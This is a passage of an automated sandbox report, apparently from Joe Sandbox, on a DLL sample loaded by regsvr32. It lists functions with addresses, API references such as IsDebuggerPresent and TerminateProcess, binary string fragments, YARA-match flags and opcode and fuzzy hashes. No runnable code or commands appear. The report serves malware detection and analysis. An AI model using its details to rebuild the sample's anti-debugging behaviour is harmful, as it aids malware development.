                                                                                                                                • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800119A8 Relevance: 6.3, Strings: 5, Instructions: 63COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Qq$bt$vird$+$S
                                                                                                                                • API String ID: 0-3373980505
                                                                                                                                • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                                                                                • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB95944 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 154COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _getptd.LIBCMT ref: 00007FFFEFB9597E
                                                                                                                                  • Part of subcall function 00007FFFEFB96550: RtlCaptureContext.KERNEL32 ref: 00007FFFEFB9658F
                                                                                                                                  • Part of subcall function 00007FFFEFB96550: IsDebuggerPresent.KERNEL32 ref: 00007FFFEFB9662D
                                                                                                                                  • Part of subcall function 00007FFFEFB96550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFFEFB96637
                                                                                                                                  • Part of subcall function 00007FFFEFB96550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFFEFB96642
                                                                                                                                  • Part of subcall function 00007FFFEFB96550: GetCurrentProcess.KERNEL32 ref: 00007FFFEFB96658
                                                                                                                                  • Part of subcall function 00007FFFEFB96550: TerminateProcess.KERNEL32 ref: 00007FFFEFB96666
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
                                                                                                                                • String ID: C$Qr2_:g
                                                                                                                                • API String ID: 1583075380-1992236080
                                                                                                                                • Opcode ID: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
                                                                                                                                • Instruction ID: 1363c8c4b60abfe07ab81e02f7d999f10acdc56a1451c16c8067f4055cbb09a6
                                                                                                                                • Opcode Fuzzy Hash: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
                                                                                                                                • Instruction Fuzzy Hash: 5C51AE66A5868341EA609B22A4513BBB3D0FF85BA0F488031EE4D47AF9DE3CE015C702
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180011AD0 Relevance: 5.3, Strings: 4, Instructions: 335COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: V$@$P9$^_"
                                                                                                                                • API String ID: 0-1880944046
                                                                                                                                • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                                                                                • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9C6E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale_getptd
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 3731964398-1052752507
                                                                                                                                • Opcode ID: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
                                                                                                                                • Instruction ID: eb8f72c5ec5ae4cdd7c629bdc8fed0f8ab087dfd9e14d897fc7d813d2264d0e8
                                                                                                                                • Opcode Fuzzy Hash: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
                                                                                                                                • Instruction Fuzzy Hash: FC215572B08A8396EB689B25D9453EAB3E0FB88755F004136C61D876F6DF3CE4648602
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800132F0 Relevance: 5.3, Strings: 4, Instructions: 312COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: =_$F)k$b/$syG
                                                                                                                                • API String ID: 0-3955183656
                                                                                                                                • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                                                                                • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9C2B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale_getptd
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 3731964398-1052752507
                                                                                                                                • Opcode ID: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
                                                                                                                                • Instruction ID: 1a67a88e49e39608d2523ae2b64075dbbc4af42f2bff78665340f16aa0195614
                                                                                                                                • Opcode Fuzzy Hash: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
                                                                                                                                • Instruction Fuzzy Hash: F1216A72B08A8396EB289B60E4457A973A1FB88B90F444135DA5D873B4CF3CE554C701
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180002D70 Relevance: 5.3, Strings: 4, Instructions: 266COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: #X$'Xsa$iJ6$vG
                                                                                                                                • API String ID: 0-746338152
                                                                                                                                • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                                                                                • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800097C0 Relevance: 5.3, Strings: 4, Instructions: 257COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: *i^$MIC$-Z$]2
                                                                                                                                • API String ID: 0-498664264
                                                                                                                                • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                                                                                • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180027F9C Relevance: 5.2, Strings: 4, Instructions: 237COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: >97"$?$LsRW$~x
                                                                                                                                • API String ID: 0-2554301858
                                                                                                                                • Opcode ID: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
                                                                                                                                • Instruction ID: eb38a845d203af82144c13b3f151f5fa827cd0cb8678597ee03ac1a376820114
                                                                                                                                • Opcode Fuzzy Hash: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
                                                                                                                                • Instruction Fuzzy Hash: E1D1E7705067C8CBEBBADFA4D885BCD3BA8FB44744F106219EC4AEA250DB745749CB01
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180010758 Relevance: 5.2, Strings: 4, Instructions: 222COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: B$EG$QsF$_
                                                                                                                                • API String ID: 0-784369960
                                                                                                                                • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                                                                                • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180020334 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: -`G$.$5B.Y$Z`35
                                                                                                                                • API String ID: 0-1363032466
                                                                                                                                • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                                                                                • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000EE98 Relevance: 5.2, Strings: 4, Instructions: 167COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: *+_$WSh$\O$#o
                                                                                                                                • API String ID: 0-1846314129
                                                                                                                                • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                                                                                • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180024D80 Relevance: 5.2, Strings: 4, Instructions: 155COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: .B$O$M*K$\<
                                                                                                                                • API String ID: 0-3225238681
                                                                                                                                • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                                                                                • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018002A42C Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $$$$xVO$~O
                                                                                                                                • API String ID: 0-3655128719
                                                                                                                                • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                                                                                • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800024B8 Relevance: 5.1, Strings: 4, Instructions: 79COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ,IW$G$JMg$l
                                                                                                                                • API String ID: 0-1370644289
                                                                                                                                • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                                                                                • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9AF70 Relevance: 4.9, APIs: 3, Instructions: 435COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _errno$__tzset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3587134695-0
                                                                                                                                • Opcode ID: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
                                                                                                                                • Instruction ID: c2e953564bb6a9f8f86d72378632da2607e5de8317861490c97149c2f908be65
                                                                                                                                • Opcode Fuzzy Hash: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
                                                                                                                                • Instruction Fuzzy Hash: F5026F32A0C683C6E7688F6990A423D37E1EB85791F64C03AD74E466F6CE38E644C702
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9FB6C Relevance: 4.6, APIs: 3, Instructions: 95COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _errno$DecodePointer_lock
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2175075375-0
                                                                                                                                • Opcode ID: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
                                                                                                                                • Instruction ID: 049ee773d5a9964a21122cb141c2fd9abbf0c3d48f73140f68a398248d163e66
                                                                                                                                • Opcode Fuzzy Hash: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
                                                                                                                                • Instruction Fuzzy Hash: 1F31AD21F0C75342FB659A65A66637A71E6AF543F4F148035EE4D87EF6EE2CE8008702
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9D318 Relevance: 4.5, APIs: 3, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlCaptureContext.KERNEL32 ref: 00007FFFEFB9D357
                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFFEFB9D39D
                                                                                                                                • UnhandledExceptionFilter.KERNEL32 ref: 00007FFFEFB9D3A8
                                                                                                                                  • Part of subcall function 00007FFFEFB96F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFFEFB97194,?,?,?,?,00007FFFEFB96C69,?,?,00000000,00007FFFEFB930C0), ref: 00007FFFEFB96FCF
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextFileModuleName
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2731829486-0
                                                                                                                                • Opcode ID: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
                                                                                                                                • Instruction ID: 1fa25ca43c33d7ca554b09cecd606ac0890057683c955af8dcef849847ed6f12
                                                                                                                                • Opcode Fuzzy Hash: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
                                                                                                                                • Instruction Fuzzy Hash: 8A114C25A2CA8782E7259B51E8543BA73E6FF85324F440139EA8D02AF5DF3DE404CB02
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001496C Relevance: 4.2, Strings: 3, Instructions: 493COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: *4$5F$S^r
                                                                                                                                • API String ID: 0-3556444313
                                                                                                                                • Opcode ID: b0743c1ec2acfd1e8c25e2f2eb51529e5db6bb1cba9eb6ae32e5b6bbd2ab9b57
                                                                                                                                • Instruction ID: 3ee7e47d854a132278560872cba22db18b0762c6b33e49020313469b2ebed1ad
                                                                                                                                • Opcode Fuzzy Hash: b0743c1ec2acfd1e8c25e2f2eb51529e5db6bb1cba9eb6ae32e5b6bbd2ab9b57
                                                                                                                                • Instruction Fuzzy Hash: 5542F87154478C8BDBB8CF28C88D7DE7BE0FB54344F20461DE9AA8A261DBB49685CF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001BB04 Relevance: 4.0, Strings: 3, Instructions: 286COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: &lz2$'~W$<x<
                                                                                                                                • API String ID: 0-2268522332
                                                                                                                                • Opcode ID: b4611eb32689572206be92ce00cd3efb5fa8211b09b44c780cf48fb277428f5a
                                                                                                                                • Instruction ID: 36e71a14450f7168630c03d0025ff7d4b6ed06a40f4a953d8196177a15a51c97
                                                                                                                                • Opcode Fuzzy Hash: b4611eb32689572206be92ce00cd3efb5fa8211b09b44c780cf48fb277428f5a
                                                                                                                                • Instruction Fuzzy Hash: 47E10574A14B0C8BDB69DFB8D04A6CDBBF2FB54344F20411DE80AAB292D7B49519CF85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000BDD0 Relevance: 4.0, Strings: 3, Instructions: 262COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
